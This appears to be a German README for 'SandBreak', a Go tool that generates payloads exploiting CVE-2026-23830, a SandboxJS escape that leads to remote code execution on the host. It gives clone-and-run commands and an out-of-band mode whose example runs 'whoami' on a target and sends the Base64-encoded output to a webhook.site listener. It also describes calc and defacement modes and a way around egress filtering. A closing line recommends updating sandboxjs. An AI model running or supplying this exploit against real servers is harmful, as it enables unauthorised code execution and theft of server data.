
# Generiert und liefert Exploit-Payloads für CVE-2026-23830, einen SandboxJS-Escape, mit Modi für blinde OOB-Exfiltration und lokalen Calc-PoC. Unterstützt HTTP/HTTPS-Listener und erzeugt minifizierte JavaScript-Payloads.
SandBreak ist ein robuster, in Go geschriebener Exploit-Generator, der entwickelt wurde, um die SandboxJS-Escape-Schwachstelle (CVE-2026-23830) auszunutzen.
Dieses Tool nutzt den ungeschützten AsyncFunction-Konstruktor in älteren Versionen von sandboxjs aus, wodurch Angreifer die V8-Sandbox-Umgebung verlassen und beliebigen Code auf dem Host-System ausführen können. Es unterstützt mehrere Payload-Modi, darunter Blind OOB Exfiltration, Defacement und Error-Based RCE.
oob: Out-of-Band-Datenexfiltration (HTTP/HTTPS) für Blind-Szenarien.calc: Öffnet calc.exe (klassischer PoC).Repository klonen und ausführen:
git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go
go run CVE-2026-23830.go -mode [MODUS] -cmd [BEFEHL] [OPTIONEN]
Verwenden Sie diesen Modus, wenn Sie kein Ausgabe-Feedback haben. Er führt den Befehl aus und sendet das Base64-kodierte Ergebnis an Ihren Listener (z. B. webhook.site).
go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
Umgeht erfolgreich grundlegende Egress-Filtering-Abstürze durch Behandlung von Netzwerkfehlern.
Öffnet einen Taschenrechner auf dem Windows-Server.
go run CVE-2026-23830.go -mode calc
Angreifer empfängt die Benutzerdaten des Servers über Webhook, obwohl keine visuelle Ausgabe auf der Website sichtbar ist.
Dieses Tool wurde ausschließlich für Bildungszwecke und autorisierte Penetrationstests erstellt.
Aktualisieren Sie sandboxjs auf die neueste Version, in der der AsyncFunction-Konstruktor ordnungsgemäß in der Sandbox isoliert ist.
npm update sandboxjs
Autor: Meysam Bal-afkan
Lizenz: MIT